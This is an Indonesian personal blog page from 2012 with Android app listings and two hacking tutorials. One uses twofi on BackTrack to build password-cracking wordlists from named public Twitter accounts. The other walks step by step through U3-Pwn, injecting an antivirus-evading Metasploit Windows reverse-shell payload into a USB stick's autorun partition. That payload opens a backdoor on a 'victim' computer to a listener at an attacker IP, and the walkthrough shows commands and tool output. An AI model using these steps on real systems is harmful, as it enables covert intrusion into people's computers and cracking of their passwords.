10.03.2012

My Fine [Digital] ARt

Fine digital art

9.07.2012

Launcher Webchat Freenode HC Channel

Filename: HC channel.apk
Size : 218,657 bytes
Distribution : Freeware
Description: Aplikasi launcher webchat.freenode channel #h-c untuk pengguna Tablet pc berbasis Android
Md5 checksum : 0686cdaad661e56ade18ac9b4560f6c2

screen shoot
screen shoot 1

screen shoot 2

screen shoot 3



9.06.2012

Weblog Launcher ny Semarak [beta version]

Name: Semaraks.apk
File size :
213,217 bytes
Distributions:
Freeware
Descriptions:
Aplikasi blog launcher utk pengguna android guna memudahkan akses membaca postingan dalam format yang sudah disesuaikan untuk mobile device anda.
                      Links :
https://sites.google.com/site/semarak2011/dokumen/semaraks.apk


screen shoot
screen shoot 1

screen shoot 2
 

9.02.2012

Membuat Wordlist Dengan TWOFI di Backtrack

Siapa yg tak kenal dengan twitter, berdiri sejak tahun 2006 seketika mendapat sambutan luas di dunia maya. Hingga sekarang istilah follow me, RT menjadi kata2 yang rutin diketik dan muncul oleh para usernya, tak hanya hitungan detik, sepersekian sekon jutaan twit terlontar melalui media ini. didukung olehbanyak device yang mendukung aplikasi ini serta kemudahan lainnya, twitter terbukti mampu merombak cara komunikasi kita saat ini. tapi hal ini juga membawa dampak buruk kecanduan pada para penggunanya.

Namun seorang researcher di bidang IT, Joshua Dustin melihat hal ini dengan cara yang berbeda. Dia memandang jutaan kata yang terlontar lewat akun twitter memiliki potensi untuk meng_generate worldlist guna memecahkan enkripsi sebuah data. Dalam blognya ia memperlihatkan bagaimana twitter menjadi gudang kosa kata dalam pembuatan wordlist untuk cracking dan kemudian ia kembangkan menjadi dsatu aplikasi bernama "twofi".
Relevan pemaparan singkat diatas, maka dalam postingan kali ini saya sedikit mengulas bagamana pemakaian twofi...ok here we go

requirement:
  • PC/notebook yg sudah memakai Linux OS (dalam hal ini saya menggunakan backtrack 5 r2...blum upgrade)
  • Aplikasi twofi
  • list user twitter yang akan digunakan dalam proses pembuatan wordlist (sy menggunakan string yg bersumber dr beraneka macam user mulai akun berita hingga public figure yakni "detikcom,tvOneNews,korantempo,desianwar,boediono,enda,tifsembiring,nukman,budip,triomacan2000")
Step
- Login sebagai root dan instal twofi dr repo (jika anda telah menggunakan Backtrack 5 R3, step ini bisa anda skip)
apt-get install twofi

- Jalankan twofi di menu

backtrack - privilege escalation - passwords Attacks - offline Attacks - twofi


disini kita akan lihat beberapa option bantuan tentang penggunaan twofi
-c : akan memperlihatkan jumlah frekuensi kemunculan sebuah kata2 dlm sebuah akun twitter (ex: -c )
-m : set jumlah minimal huruf dalam satu kata yang akan dipilih/filter kedalam file output wordlist (pemakaian: -m 6 utk min 6 huruf/karakter dlm satu kata)
-T : menggunakan sebuah filelist term
-t : menggunakan  term langsung
-U : utk opsi ini anda harus membuat sebuah file txt yang berisi list target user yg akan digunakan dlm proses pembuatan wordlist (ex: -U /root/listuser.txt ).
contoh file list user : download
-u : opsi ini sebagai alternatif dr opsi -T dimana anda hanya perlu menuliskan nama user tanpa harus menggunakan sebuah file  (ex: -u detikcom,tvOneNews,korantempo )
-v : untuk menggunkan mode verbose


- Proses pembuatan wordlistnynya bisa lewat 2 cara:
*penggunaan tanpa file list user:
ruby twofi.rb -m 6 -u detikcom,tvOneNews,korantempo,desianwar,boediono,enda,tifsembiring,nukman,budip >> /root/newlist.lst

*penggunaan dengan file list user:
ruby twofi.rb -m 6 -U /root/listuser.txt >> root/newlist.lst

dan hasilnya wordlist bisa dilihat di folder root
gedit /root/newlist.lst


OK...slamat mencoba

related link:
http://hack.pauvam.com/rssposts/tag/glen-roberts/
http://www.digininja.org/twofi.php

8.17.2012

U3 UFD Pawned

 Ditahun-tahun yang lalu kita mungkin masih mengingat UFD yang memiliki U3 chipset dapat digunakan sebagai usb tools hacking. beberapa diantaranya dikenal sebagai USB switchblade dan USB Hacksaw dimana program tertentu diinjeksikan kedalam chipset u3 untuk "mengemulasikan cdrom drive" yang akan mengeksekusi program yg diinjeksikan tersebut (autoplay). output yg dihasilkan oleh program ini berupa informasi2 hash password LSA, IP information, browser history hingga cookie auto fill information.

U3 Pawn masih menggunakan metode yang sama dengan usb switchblade, akan tetapi code program di injeksikan bukan ditujukan untuk memanen informasi2 dari komputer korban melainkan membuat/menjalankan backdoor pada port tertentu. Uniknya proses yang dijalankan berada didumping memory (tidak membuat file baru di komputer korban) sehingga saat dilepas dari komputer korban background prosesnya masih tetapa berjalan selama masih dalam sesi yang sama (tidak di restart)..

 Requirement    :
  • UFD yang mendukung U3, ex: UFD bermerk Sandisk, Kingston (tipe lama)...
  • Linux yg memiliki Metasploit (ex: Backtrack)
  • U3 Tool (ada di repo Backtrack)
  • U3 Pwn.tar.gz (http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz)

The step:
- Masukkan UFD U3 anda ke usb port.
- Install U3 tool kedalam Linux anda
apt-get install u3-tool

- Download U3 Pwn.tar.gz
wget http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz

- Ekstrak U3-Pwn.tar.gz
wget tar xzvf U3-Pwn.tar.gz

- Jalankan U3-pwn.tar.gz
cd  /root/U3-Pwn
python U3-Pwn.py

- Pilih 1 untuk men-Generate & Replace Iso Image
Enter the number: 1

- Pilih 1 untuk memilih payload exploit (Windows Shell Reverse_TCP) yang akan dijalankan
   Enter number: 1


- Pilih 2 untuk memilih shikata_ga_nai sebagai encoder untuk melewati firewall dan antivirus.
Enter the number: 1

- Masukkan no ip host anda serta port backdoorny, ip lan atau bisa juga ip publik yang anda dapatkan dari ISP
ex: dalam kasus ini saya menggunakan backtrack sebagai host  yang mendapatkan ip  192.168.56.101 sedangkan korban memiliki IP 192.168.56.1
 Enter Ip Address for reverse listener: 192.168.56.101

 Enter the port of the Listener: 4444

- Masukkan letak UFD di linux ex:sdb1
   Enter the device to change iso image on (example /dev/sde1): /dev/sdb1

                                                                             
          ~    .__ °.__   0       o                    ^   .__ °__  `´       
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__. 
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  | 
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O| 
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____| 
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´ 

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************


  Generating Shellcode Please Wait...
|**************************************************| 100%
OK


- Pilih yes untuk menjalan exploit handler
Do you want to start a listener to receive the payload yes or no: yes

- Unplug UFD
- Masukkan UFD ke komputer korban
- Tunggu beberapa saat dan komputer korban akan membuka backdoornya untuk komputer host....selanjutnya terserah anda...:))


related link:
http://packetstormsecurity.org/files/114502/U3-Pwn-Sandisk-Executable-Injection-Tool.html

Twitter Delicious Facebook Digg Stumbleupon Favorites More